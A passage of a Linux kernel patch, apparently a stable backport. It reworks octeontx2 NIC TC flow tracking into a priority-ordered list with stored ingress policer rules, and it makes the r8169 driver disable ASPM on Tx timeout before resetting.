+ 	aq->qidx = profile;
+ 	aq->ctype = NIX_AQ_CTYPE_BANDPROF;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index efd66224b3dbf..44950c2542bb7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -339,13 +339,8 @@ struct otx2_flow_config {
+ 	struct list_head	flow_list;
+ 	u32			dmacflt_max_flows;
+ 	u16                     max_flows;
+-};
+-
+-struct otx2_tc_info {
+-	/* hash table to store TC offloaded flows */
+-	struct rhashtable		flow_table;
+-	struct rhashtable_params	flow_ht_params;
+-	unsigned long			*tc_entries_bitmap;
++	struct list_head	flow_list_tc;
++	bool			ntuple;
+ };
+ 
+ struct dev_hw_ops {
+@@ -465,7 +460,6 @@ struct otx2_nic {
+ 	/* NPC MCAM */
+ 	struct otx2_flow_config	*flow_cfg;
+ 	struct otx2_mac_table	*mac_table;
+-	struct otx2_tc_info	tc_info;
+ 
+ 	u64			reset_count;
+ 	struct work_struct	reset_task;
+@@ -1024,7 +1018,8 @@ int otx2_init_tc(struct otx2_nic *nic);
+ void otx2_shutdown_tc(struct otx2_nic *nic);
+ int otx2_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ 		  void *type_data);
+-int otx2_tc_alloc_ent_bitmap(struct otx2_nic *nic);
++void otx2_tc_apply_ingress_police_rules(struct otx2_nic *nic);
++
+ /* CGX/RPM DMAC filters support */
+ int otx2_dmacflt_get_max_cnt(struct otx2_nic *pf);
+ int otx2_dmacflt_add(struct otx2_nic *pf, const u8 *mac, u32 bit_pos);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_devlink.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_devlink.c
+index 777a27047c8e8..5f71a72f95e50 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_devlink.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_devlink.c
+@@ -41,7 +41,6 @@ static int otx2_dl_mcam_count_set(struct devlink *devlink, u32 id,
+ 		return 0;
+ 
+ 	otx2_alloc_mcam_entries(pfvf, ctx->val.vu16);
+-	otx2_tc_alloc_ent_bitmap(pfvf);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
+index 0eb74e8c553dd..aaf1af2a402ec 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
+@@ -753,6 +753,7 @@ static int otx2_set_rxnfc(struct net_device *dev, struct ethtool_rxnfc *nfc)
+ 	struct otx2_nic *pfvf = netdev_priv(dev);
+ 	int ret = -EOPNOTSUPP;
+ 
++	pfvf->flow_cfg->ntuple = ntuple;
+ 	switch (nfc->cmd) {
+ 	case ETHTOOL_SRXFH:
+ 		ret = otx2_set_rss_hash_opts(pfvf, nfc);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 5c4a4d3557702..5c757508322b9 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -276,6 +276,7 @@ int otx2vf_mcam_flow_init(struct otx2_nic *pfvf)
+ 
+ 	flow_cfg = pfvf->flow_cfg;
+ 	INIT_LIST_HEAD(&flow_cfg->flow_list);
++	INIT_LIST_HEAD(&flow_cfg->flow_list_tc);
+ 	flow_cfg->max_flows = 0;
+ 
+ 	return 0;
+@@ -298,6 +299,7 @@ int otx2_mcam_flow_init(struct otx2_nic *pf)
+ 		return -ENOMEM;
+ 
+ 	INIT_LIST_HEAD(&pf->flow_cfg->flow_list);
++	INIT_LIST_HEAD(&pf->flow_cfg->flow_list_tc);
+ 
+ 	/* Allocate bare minimum number of MCAM entries needed for
+ 	 * unicast and ntuple filters.
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 1d2d72c60a12c..18c5d2b3f7f95 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -566,7 +566,9 @@ static irqreturn_t otx2_pfvf_mbox_intr_handler(int irq, void *pf_irq)
+ 		otx2_write64(pf, RVU_PF_VFPF_MBOX_INTX(1), intr);
+ 		otx2_queue_work(mbox, pf->mbox_pfvf_wq, 64, vfs, intr,
+ 				TYPE_PFVF);
+-		vfs -= 64;
++		if (intr)
++			trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
++		vfs = 64;
+ 	}
+ 
+ 	intr = otx2_read64(pf, RVU_PF_VFPF_MBOX_INTX(0));
+@@ -574,7 +576,8 @@ static irqreturn_t otx2_pfvf_mbox_intr_handler(int irq, void *pf_irq)
+ 
+ 	otx2_queue_work(mbox, pf->mbox_pfvf_wq, 0, vfs, intr, TYPE_PFVF);
+ 
+-	trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
++	if (intr)
++		trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -1855,6 +1858,8 @@ int otx2_open(struct net_device *netdev)
+ 	if (pf->flags & OTX2_FLAG_DMACFLTR_SUPPORT)
+ 		otx2_dmacflt_reinstall_flows(pf);
+ 
++	otx2_tc_apply_ingress_police_rules(pf);
++
+ 	err = otx2_rxtx_enable(pf, true);
+ 	/* If a mbox communication error happens at this point then interface
+ 	 * will end up in a state such that it is in down state but hardware
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+index 1aeb18a901b13..bb77ab7ddfefd 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+@@ -48,9 +48,8 @@ struct otx2_tc_flow_stats {
+ };
+ 
+ struct otx2_tc_flow {
+-	struct rhash_head		node;
++	struct list_head		list;
+ 	unsigned long			cookie;
+-	unsigned int			bitpos;
+ 	struct rcu_head			rcu;
+ 	struct otx2_tc_flow_stats	stats;
+ 	spinlock_t			lock; /* lock for stats */
+@@ -58,31 +57,13 @@ struct otx2_tc_flow {
+ 	u16				entry;
+ 	u16				leaf_profile;
+ 	bool				is_act_police;
++	u32				prio;
++	struct npc_install_flow_req	req;
++	u64				rate;
++	u32				burst;
++	bool				is_pps;
+ };
+ 
+-int otx2_tc_alloc_ent_bitmap(struct otx2_nic *nic)
+-{
+-	struct otx2_tc_info *tc = &nic->tc_info;
+-
+-	if (!nic->flow_cfg->max_flows)
+-		return 0;
+-
+-	/* Max flows changed, free the existing bitmap */
+-	kfree(tc->tc_entries_bitmap);
+-
+-	tc->tc_entries_bitmap =
+-			kcalloc(BITS_TO_LONGS(nic->flow_cfg->max_flows),
+-				sizeof(long), GFP_KERNEL);
+-	if (!tc->tc_entries_bitmap) {
+-		netdev_err(nic->netdev,
+-			   "Unable to alloc TC flow entries bitmap\n");
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL(otx2_tc_alloc_ent_bitmap);
+-
+ static void otx2_get_egress_burst_cfg(struct otx2_nic *nic, u32 burst,
+ 				      u32 *burst_exp, u32 *burst_mantissa)
+ {
+@@ -321,21 +302,10 @@ static int otx2_tc_egress_matchall_delete(struct otx2_nic *nic,
+ 	return err;
+ }
+ 
+-static int otx2_tc_act_set_police(struct otx2_nic *nic,
+-				  struct otx2_tc_flow *node,
+-				  struct flow_cls_offload *f,
+-				  u64 rate, u32 burst, u32 mark,
+-				  struct npc_install_flow_req *req, bool pps)
++static int otx2_tc_act_set_hw_police(struct otx2_nic *nic,
++				     struct otx2_tc_flow *node)
+ {
+-	struct netlink_ext_ack *extack = f->common.extack;
+-	struct otx2_hw *hw = &nic->hw;
+-	int rq_idx, rc;
+-
+-	rq_idx = find_first_zero_bit(&nic->rq_bmap, hw->rx_queues);
+-	if (rq_idx >= hw->rx_queues) {
+-		NL_SET_ERR_MSG_MOD(extack, "Police action rules exceeded");
+-		return -EINVAL;
+-	}
++	int rc;
+ 
+ 	mutex_lock(&nic->mbox.lock);
+ 
+@@ -345,23 +315,17 @@ static int otx2_tc_act_set_police(struct otx2_nic *nic,
+ 		return rc;
+ 	}
+ 
+-	rc = cn10k_set_ipolicer_rate(nic, node->leaf_profile, burst, rate, pps);
++	rc = cn10k_set_ipolicer_rate(nic, node->leaf_profile,
++				     node->burst, node->rate, node->is_pps);
+ 	if (rc)
+ 		goto free_leaf;
+ 
+-	rc = cn10k_map_unmap_rq_policer(nic, rq_idx, node->leaf_profile, true);
++	rc = cn10k_map_unmap_rq_policer(nic, node->rq, node->leaf_profile, true);
+ 	if (rc)
+ 		goto free_leaf;
+ 
+ 	mutex_unlock(&nic->mbox.lock);
+ 
+-	req->match_id = mark & 0xFFFFULL;
+-	req->index = rq_idx;
+-	req->op = NIX_RX_ACTIONOP_UCAST;
+-	set_bit(rq_idx, &nic->rq_bmap);
+-	node->is_act_police = true;
+-	node->rq = rq_idx;
+-
+ 	return 0;
+ 
+ free_leaf:
+@@ -373,6 +337,39 @@ free_leaf:
+ 	return rc;
+ }
+ 
++static int otx2_tc_act_set_police(struct otx2_nic *nic,
++				  struct otx2_tc_flow *node,
++				  struct flow_cls_offload *f,
++				  u64 rate, u32 burst, u32 mark,
++				  struct npc_install_flow_req *req, bool pps)
++{
++	struct netlink_ext_ack *extack = f->common.extack;
++	struct otx2_hw *hw = &nic->hw;
++	int rq_idx, rc;
++
++	rq_idx = find_first_zero_bit(&nic->rq_bmap, hw->rx_queues);
++	if (rq_idx >= hw->rx_queues) {
++		NL_SET_ERR_MSG_MOD(extack, "Police action rules exceeded");
++		return -EINVAL;
++	}
++
++	req->match_id = mark & 0xFFFFULL;
++	req->index = rq_idx;
++	req->op = NIX_RX_ACTIONOP_UCAST;
++
++	node->is_act_police = true;
++	node->rq = rq_idx;
++	node->burst = burst;
++	node->rate = rate;
++	node->is_pps = pps;
++
++	rc = otx2_tc_act_set_hw_police(nic, node);
++	if (!rc)
++		set_bit(rq_idx, &nic->rq_bmap);
++
++	return rc;
++}
++
+ static int otx2_tc_parse_actions(struct otx2_nic *nic,
+ 				 struct flow_action *flow_action,
+ 				 struct npc_install_flow_req *req,
+@@ -689,8 +686,117 @@ static int otx2_tc_prepare_flow(struct otx2_nic *nic, struct otx2_tc_flow *node,
+ 	return otx2_tc_parse_actions(nic, &rule->action, req, f, node);
+ }
+ 
+-static int otx2_del_mcam_flow_entry(struct otx2_nic *nic, u16 entry)
++static void otx2_destroy_tc_flow_list(struct otx2_nic *pfvf)
++{
++	struct otx2_flow_config *flow_cfg = pfvf->flow_cfg;
++	struct otx2_tc_flow *iter, *tmp;
++
++	if (!(pfvf->flags & OTX2_FLAG_MCAM_ENTRIES_ALLOC))
++		return;
++
++	list_for_each_entry_safe(iter, tmp, &flow_cfg->flow_list_tc, list) {
++		list_del(&iter->list);
++		kfree(iter);
++		flow_cfg->nr_flows--;
++	}
++}
++
++static struct otx2_tc_flow *otx2_tc_get_entry_by_cookie(struct otx2_flow_config *flow_cfg,
++							unsigned long cookie)
++{
++	struct otx2_tc_flow *tmp;
++
++	list_for_each_entry(tmp, &flow_cfg->flow_list_tc, list) {
++		if (tmp->cookie == cookie)
++			return tmp;
++	}
++
++	return NULL;
++}
++
++static struct otx2_tc_flow *otx2_tc_get_entry_by_index(struct otx2_flow_config *flow_cfg,
++						       int index)
++{
++	struct otx2_tc_flow *tmp;
++	int i = 0;
++
++	list_for_each_entry(tmp, &flow_cfg->flow_list_tc, list) {
++		if (i == index)
++			return tmp;
++		i++;
++	}
++
++	return NULL;
++}
++
++static void otx2_tc_del_from_flow_list(struct otx2_flow_config *flow_cfg,
++				       struct otx2_tc_flow *node)
++{
++	struct list_head *pos, *n;
++	struct otx2_tc_flow *tmp;
++
++	list_for_each_safe(pos, n, &flow_cfg->flow_list_tc) {
++		tmp = list_entry(pos, struct otx2_tc_flow, list);
++		if (node == tmp) {
++			list_del(&node->list);
++			return;
++		}
++	}
++}
++
++static int otx2_tc_add_to_flow_list(struct otx2_flow_config *flow_cfg,
++				    struct otx2_tc_flow *node)
++{
++	struct list_head *pos, *n;
++	struct otx2_tc_flow *tmp;
++	int index = 0;
++
++	/* If the flow list is empty then add the new node */
++	if (list_empty(&flow_cfg->flow_list_tc)) {
++		list_add(&node->list, &flow_cfg->flow_list_tc);
++		return index;
++	}
++
++	list_for_each_safe(pos, n, &flow_cfg->flow_list_tc) {
++		tmp = list_entry(pos, struct otx2_tc_flow, list);
++		if (node->prio < tmp->prio)
++			break;
++		index++;
++	}
++
++	list_add(&node->list, pos->prev);
++	return index;
++}
++
++static int otx2_add_mcam_flow_entry(struct otx2_nic *nic, struct npc_install_flow_req *req)
++{
++	struct npc_install_flow_req *tmp_req;
++	int err;
++
++	mutex_lock(&nic->mbox.lock);
++	tmp_req = otx2_mbox_alloc_msg_npc_install_flow(&nic->mbox);
++	if (!tmp_req) {
++		mutex_unlock(&nic->mbox.lock);
++		return -ENOMEM;
++	}
++
++	memcpy(tmp_req, req, sizeof(struct npc_install_flow_req));
++	/* Send message to AF */
++	err = otx2_sync_mbox_msg(&nic->mbox);
++	if (err) {
++		netdev_err(nic->netdev, "Failed to install MCAM flow entry %d\n",
++			   req->entry);
++		mutex_unlock(&nic->mbox.lock);
++		return -EFAULT;
++	}
++
++	mutex_unlock(&nic->mbox.lock);
++	return 0;
++}
++
++static int otx2_del_mcam_flow_entry(struct otx2_nic *nic, u16 entry, u16 *cntr_val)
+ {
++	struct npc_delete_flow_rsp *rsp;
+ 	struct npc_delete_flow_req *req;
+ 	int err;
+ 
+@@ -711,22 +817,113 @@ static int otx2_del_mcam_flow_entry(struct otx2_nic *nic, u16 entry)
+ 		mutex_unlock(&nic->mbox.lock);
+ 		return -EFAULT;
+ 	}
++
++	if (cntr_val) {
++		rsp = (struct npc_delete_flow_rsp *)otx2_mbox_get_rsp(&nic->mbox.mbox,
++								      0, &req->hdr);
++		if (IS_ERR(rsp)) {
++			netdev_err(nic->netdev, "Failed to get MCAM delete response for entry %d\n",
++				   entry);
++			mutex_unlock(&nic->mbox.lock);
++			return -EFAULT;
++		}
++
++		*cntr_val = rsp->cntr_val;
++	}
++
+ 	mutex_unlock(&nic->mbox.lock);
++	return 0;
++}
++
++static int otx2_tc_update_mcam_table_del_req(struct otx2_nic *nic,
++					     struct otx2_flow_config *flow_cfg,
++					     struct otx2_tc_flow *node)
++{
++	struct list_head *pos, *n;
++	struct otx2_tc_flow *tmp;
++	int i = 0, index = 0;
++	u16 cntr_val = 0;
++
++	/* Find and delete the entry from the list and re-install
++	 * all the entries from beginning to the index of the
++	 * deleted entry to higher mcam indexes.
++	 */
++	list_for_each_safe(pos, n, &flow_cfg->flow_list_tc) {
++		tmp = list_entry(pos, struct otx2_tc_flow, list);
++		if (node == tmp) {
++			list_del(&tmp->list);
++			break;
++		}
++
++		otx2_del_mcam_flow_entry(nic, tmp->entry, &cntr_val);
++		tmp->entry++;
++		tmp->req.entry = tmp->entry;
++		tmp->req.cntr_val = cntr_val;
++		index++;
++	}
++
++	list_for_each_safe(pos, n, &flow_cfg->flow_list_tc) {
++		if (i == index)
++			break;
++
++		tmp = list_entry(pos, struct otx2_tc_flow, list);
++		otx2_add_mcam_flow_entry(nic, &tmp->req);
++		i++;
++	}
+ 
+ 	return 0;
+ }
+ 
++static int otx2_tc_update_mcam_table_add_req(struct otx2_nic *nic,
++					     struct otx2_flow_config *flow_cfg,
++					     struct otx2_tc_flow *node)
++{
++	int mcam_idx = flow_cfg->max_flows - flow_cfg->nr_flows - 1;
++	struct otx2_tc_flow *tmp;
++	int list_idx, i;
++	u16 cntr_val = 0;
++
++	/* Find the index of the entry(list_idx) whose priority
++	 * is greater than the new entry and re-install all
++	 * the entries from beginning to list_idx to higher
++	 * mcam indexes.
++	 */
++	list_idx = otx2_tc_add_to_flow_list(flow_cfg, node);
++	for (i = 0; i < list_idx; i++) {
++		tmp = otx2_tc_get_entry_by_index(flow_cfg, i);
++		if (!tmp)
++			return -ENOMEM;
++
++		otx2_del_mcam_flow_entry(nic, tmp->entry, &cntr_val);
++		tmp->entry = flow_cfg->flow_ent[mcam_idx];
++		tmp->req.entry = tmp->entry;
++		tmp->req.cntr_val = cntr_val;
++		otx2_add_mcam_flow_entry(nic, &tmp->req);
++		mcam_idx++;
++	}
++
++	return mcam_idx;
++}
++
++static int otx2_tc_update_mcam_table(struct otx2_nic *nic,
++				     struct otx2_flow_config *flow_cfg,
++				     struct otx2_tc_flow *node,
++				     bool add_req)
++{
++	if (add_req)
++		return otx2_tc_update_mcam_table_add_req(nic, flow_cfg, node);
++
++	return otx2_tc_update_mcam_table_del_req(nic, flow_cfg, node);
++}
++
+ static int otx2_tc_del_flow(struct otx2_nic *nic,
+ 			    struct flow_cls_offload *tc_flow_cmd)
+ {
+ 	struct otx2_flow_config *flow_cfg = nic->flow_cfg;
+-	struct otx2_tc_info *tc_info = &nic->tc_info;
+ 	struct otx2_tc_flow *flow_node;
+ 	int err;
+ 
+-	flow_node = rhashtable_lookup_fast(&tc_info->flow_table,
+-					   &tc_flow_cmd->cookie,
+-					   tc_info->flow_ht_params);
++	flow_node = otx2_tc_get_entry_by_cookie(flow_cfg, tc_flow_cmd->cookie);
+ 	if (!flow_node) {
+ 		netdev_err(nic->netdev, "tc flow not found for cookie 0x%lx\n",
+ 			   tc_flow_cmd->cookie);
+@@ -734,6 +931,11 @@ static int otx2_tc_del_flow(struct otx2_nic *nic,
+ 	}
+ 
+ 	if (flow_node->is_act_police) {
++		__clear_bit(flow_node->rq, &nic->rq_bmap);
++
++		if (nic->flags & OTX2_FLAG_INTF_DOWN)
++			goto free_mcam_flow;
++
+ 		mutex_lock(&nic->mbox.lock);
+ 
+ 		err = cn10k_map_unmap_rq_policer(nic, flow_node->rq,
+@@ -749,21 +951,14 @@ static int otx2_tc_del_flow(struct otx2_nic *nic,
+ 				   "Unable to free leaf bandwidth profile(%d)\n",
+ 				   flow_node->leaf_profile);
+ 
+-		__clear_bit(flow_node->rq, &nic->rq_bmap);
+-
+ 		mutex_unlock(&nic->mbox.lock);
+ 	}
+ 
+-	otx2_del_mcam_flow_entry(nic, flow_node->entry);
+-
+-	WARN_ON(rhashtable_remove_fast(&nic->tc_info.flow_table,
+-				       &flow_node->node,
+-				       nic->tc_info.flow_ht_params));
++free_mcam_flow:
++	otx2_del_mcam_flow_entry(nic, flow_node->entry, NULL);
++	otx2_tc_update_mcam_table(nic, flow_cfg, flow_node, false);
+ 	kfree_rcu(flow_node, rcu);
+-
+-	clear_bit(flow_node->bitpos, tc_info->tc_entries_bitmap);
+ 	flow_cfg->nr_flows--;
+-
+ 	return 0;
+ }
+ 
+@@ -772,15 +967,19 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ {
+ 	struct netlink_ext_ack *extack = tc_flow_cmd->common.extack;
+ 	struct otx2_flow_config *flow_cfg = nic->flow_cfg;
+-	struct otx2_tc_info *tc_info = &nic->tc_info;
+ 	struct otx2_tc_flow *new_node, *old_node;
+ 	struct npc_install_flow_req *req, dummy;
+-	int rc, err;
++	int rc, err, mcam_idx;
+ 
+ 	if (!(nic->flags & OTX2_FLAG_TC_FLOWER_SUPPORT))
+ 		return -ENOMEM;
+ 
+-	if (bitmap_full(tc_info->tc_entries_bitmap, flow_cfg->max_flows)) {
++	if (nic->flags & OTX2_FLAG_INTF_DOWN) {
++		NL_SET_ERR_MSG_MOD(extack, "Interface not initialized");
++		return -EINVAL;
++	}
++
++	if (flow_cfg->nr_flows == flow_cfg->max_flows) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "Free MCAM entry not available to add the flow");
+ 		return -ENOMEM;
+@@ -792,6 +991,7 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ 		return -ENOMEM;
+ 	spin_lock_init(&new_node->lock);
+ 	new_node->cookie = tc_flow_cmd->cookie;
++	new_node->prio = tc_flow_cmd->common.prio;
+ 
+ 	memset(&dummy, 0, sizeof(struct npc_install_flow_req));
+ 
+@@ -802,12 +1002,11 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ 	}
+ 
+ 	/* If a flow exists with the same cookie, delete it */
+-	old_node = rhashtable_lookup_fast(&tc_info->flow_table,
+-					  &tc_flow_cmd->cookie,
+-					  tc_info->flow_ht_params);
++	old_node = otx2_tc_get_entry_by_cookie(flow_cfg, tc_flow_cmd->cookie);
+ 	if (old_node)
+ 		otx2_tc_del_flow(nic, tc_flow_cmd);
+ 
++	mcam_idx = otx2_tc_update_mcam_table(nic, flow_cfg, new_node, true);
+ 	mutex_lock(&nic->mbox.lock);
+ 	req = otx2_mbox_alloc_msg_npc_install_flow(&nic->mbox);
+ 	if (!req) {
+@@ -818,11 +1017,8 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ 
+ 	memcpy(&dummy.hdr, &req->hdr, sizeof(struct mbox_msghdr));
+ 	memcpy(req, &dummy, sizeof(struct npc_install_flow_req));
+-
+-	new_node->bitpos = find_first_zero_bit(tc_info->tc_entries_bitmap,
+-					       flow_cfg->max_flows);
+ 	req->channel = nic->hw.rx_chan_base;
+-	req->entry = flow_cfg->flow_ent[flow_cfg->max_flows - new_node->bitpos - 1];
++	req->entry = flow_cfg->flow_ent[mcam_idx];
+ 	req->intf = NIX_INTF_RX;
+ 	req->set_cntr = 1;
+ 	new_node->entry = req->entry;
+@@ -832,26 +1028,18 @@ static int otx2_tc_add_flow(struct otx2_nic *nic,
+ 	if (rc) {
+ 		NL_SET_ERR_MSG_MOD(extack, "Failed to install MCAM flow entry");
+ 		mutex_unlock(&nic->mbox.lock);
+-		kfree_rcu(new_node, rcu);
+ 		goto free_leaf;
+ 	}
+-	mutex_unlock(&nic->mbox.lock);
+ 
+-	/* add new flow to flow-table */
+-	rc = rhashtable_insert_fast(&nic->tc_info.flow_table, &new_node->node,
+-				    nic->tc_info.flow_ht_params);
+-	if (rc) {
+-		otx2_del_mcam_flow_entry(nic, req->entry);
+-		kfree_rcu(new_node, rcu);
+-		goto free_leaf;
+-	}
++	mutex_unlock(&nic->mbox.lock);
++	memcpy(&new_node->req, req, sizeof(struct npc_install_flow_req));
+ 
+-	set_bit(new_node->bitpos, tc_info->tc_entries_bitmap);
+ 	flow_cfg->nr_flows++;
+-
+ 	return 0;
+ 
+ free_leaf:
++	otx2_tc_del_from_flow_list(flow_cfg, new_node);
++	kfree_rcu(new_node, rcu);
+ 	if (new_node->is_act_police) {
+ 		mutex_lock(&nic->mbox.lock);
+ 
+@@ -878,16 +1066,13 @@ free_leaf:
+ static int otx2_tc_get_flow_stats(struct otx2_nic *nic,
+ 				  struct flow_cls_offload *tc_flow_cmd)
+ {
+-	struct otx2_tc_info *tc_info = &nic->tc_info;
+ 	struct npc_mcam_get_stats_req *req;
+ 	struct npc_mcam_get_stats_rsp *rsp;
+ 	struct otx2_tc_flow_stats *stats;
+ 	struct otx2_tc_flow *flow_node;
+ 	int err;
+ 
+-	flow_node = rhashtable_lookup_fast(&tc_info->flow_table,
+-					   &tc_flow_cmd->cookie,
+-					   tc_info->flow_ht_params);
++	flow_node = otx2_tc_get_entry_by_cookie(nic->flow_cfg, tc_flow_cmd->cookie);
+ 	if (!flow_node) {
+ 		netdev_info(nic->netdev, "tc flow not found for cookie %lx",
+ 			    tc_flow_cmd->cookie);
+@@ -1035,12 +1220,20 @@ static int otx2_setup_tc_block_ingress_cb(enum tc_setup_type type,
+ 					  void *type_data, void *cb_priv)
+ {
+ 	struct otx2_nic *nic = cb_priv;
++	bool ntuple;
+ 
+ 	if (!tc_cls_can_offload_and_chain0(nic->netdev, type_data))
+ 		return -EOPNOTSUPP;
+ 
++	ntuple = nic->netdev->features & NETIF_F_NTUPLE;
+ 	switch (type) {
+ 	case TC_SETUP_CLSFLOWER:
++		if (ntuple) {
++			netdev_warn(nic->netdev,
++				    "Can't install TC flower offload rule when NTUPLE is active");
++			return -EOPNOTSUPP;
++		}
++
+ 		return otx2_setup_tc_cls_flower(nic, type_data);
+ 	case TC_SETUP_CLSMATCHALL:
+ 		return otx2_setup_tc_ingress_matchall(nic, type_data);
+@@ -1123,18 +1316,8 @@ int otx2_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ }
+ EXPORT_SYMBOL(otx2_setup_tc);
+ 
+-static const struct rhashtable_params tc_flow_ht_params = {
+-	.head_offset = offsetof(struct otx2_tc_flow, node),
+-	.key_offset = offsetof(struct otx2_tc_flow, cookie),
+-	.key_len = sizeof(((struct otx2_tc_flow *)0)->cookie),
+-	.automatic_shrinking = true,
+-};
+-
+ int otx2_init_tc(struct otx2_nic *nic)
+ {
+-	struct otx2_tc_info *tc = &nic->tc_info;
+-	int err;
+-
+ 	/* Exclude receive queue 0 being used for police action */
+ 	set_bit(0, &nic->rq_bmap);
+ 
+@@ -1144,25 +1327,54 @@ int otx2_init_tc(struct otx2_nic *nic)
+ 		return -EINVAL;
+ 	}
+ 
+-	err = otx2_tc_alloc_ent_bitmap(nic);
+-	if (err)
+-		return err;
+-
+-	tc->flow_ht_params = tc_flow_ht_params;
+-	err = rhashtable_init(&tc->flow_table, &tc->flow_ht_params);
+-	if (err) {
+-		kfree(tc->tc_entries_bitmap);
+-		tc->tc_entries_bitmap = NULL;
+-	}
+-	return err;
++	return 0;
+ }
+ EXPORT_SYMBOL(otx2_init_tc);
+ 
+ void otx2_shutdown_tc(struct otx2_nic *nic)
+ {
+-	struct otx2_tc_info *tc = &nic->tc_info;
+-
+-	kfree(tc->tc_entries_bitmap);
+-	rhashtable_destroy(&tc->flow_table);
++	otx2_destroy_tc_flow_list(nic);
+ }
+ EXPORT_SYMBOL(otx2_shutdown_tc);
++
++static void otx2_tc_config_ingress_rule(struct otx2_nic *nic,
++					struct otx2_tc_flow *node)
++{
++	struct npc_install_flow_req *req;
++
++	if (otx2_tc_act_set_hw_police(nic, node))
++		return;
++
++	mutex_lock(&nic->mbox.lock);
++
++	req = otx2_mbox_alloc_msg_npc_install_flow(&nic->mbox);
++	if (!req)
++		goto err;
++
++	memcpy(req, &node->req, sizeof(struct npc_install_flow_req));
++
++	if (otx2_sync_mbox_msg(&nic->mbox))
++		netdev_err(nic->netdev,
++			   "Failed to install MCAM flow entry for ingress rule");
++err:
++	mutex_unlock(&nic->mbox.lock);
++}
++
++void otx2_tc_apply_ingress_police_rules(struct otx2_nic *nic)
++{
++	struct otx2_flow_config *flow_cfg = nic->flow_cfg;
++	struct otx2_tc_flow *node;
++
++	/* If any ingress policer rules exist for the interface then
++	 * apply those rules. Ingress policer rules depend on bandwidth
++	 * profiles linked to the receive queues. Since no receive queues
++	 * exist when interface is down, ingress policer rules are stored
++	 * and configured in hardware after all receive queues are allocated
++	 * in otx2_open.
++	 */
++	list_for_each_entry(node, &flow_cfg->flow_list_tc, list) {
++		if (node->is_act_police)
++			otx2_tc_config_ingress_rule(nic, node);
++	}
++}
++EXPORT_SYMBOL(otx2_tc_apply_ingress_police_rules);
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index 770391cefb4e4..abfa375b08878 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -576,6 +576,8 @@ struct rtl8169_tc_offsets {
+ enum rtl_flag {
+ 	RTL_FLAG_TASK_ENABLED = 0,
+ 	RTL_FLAG_TASK_RESET_PENDING,
++	RTL_FLAG_TASK_RESET_NO_QUEUE_WAKE,
++	RTL_FLAG_TASK_TX_TIMEOUT,
+ 	RTL_FLAG_MAX
+ };
+ 
+@@ -3943,7 +3945,7 @@ static void rtl8169_tx_timeout(struct net_device *dev, unsigned int txqueue)
+ {
+ 	struct rtl8169_private *tp = netdev_priv(dev);
+ 
+-	rtl_schedule_task(tp, RTL_FLAG_TASK_RESET_PENDING);
++	rtl_schedule_task(tp, RTL_FLAG_TASK_TX_TIMEOUT);
+ }
+ 
+ static int rtl8169_tx_map(struct rtl8169_private *tp, const u32 *opts, u32 len,
+@@ -4537,6 +4539,7 @@ static void rtl_task(struct work_struct *work)
+ {
+ 	struct rtl8169_private *tp =
+ 		container_of(work, struct rtl8169_private, wk.work);
++	int ret;
+ 
+ 	rtnl_lock();
+ 
+@@ -4544,9 +4547,21 @@ static void rtl_task(struct work_struct *work)
+ 	    !test_bit(RTL_FLAG_TASK_ENABLED, tp->wk.flags))
+ 		goto out_unlock;
+ 
++	if (test_and_clear_bit(RTL_FLAG_TASK_TX_TIMEOUT, tp->wk.flags)) {
++		/* ASPM compatibility issues are a typical reason for tx timeouts */
++		ret = pci_disable_link_state(tp->pci_dev, PCIE_LINK_STATE_L1 |
++							  PCIE_LINK_STATE_L0S);
++		if (!ret)
++			netdev_warn_once(tp->dev, "ASPM disabled on Tx timeout\n");
++		goto reset;
++	}
++
+ 	if (test_and_clear_bit(RTL_FLAG_TASK_RESET_PENDING, tp->wk.flags)) {
++reset:
+ 		rtl_reset_work(tp);
+ 		netif_wake_queue(tp->dev);
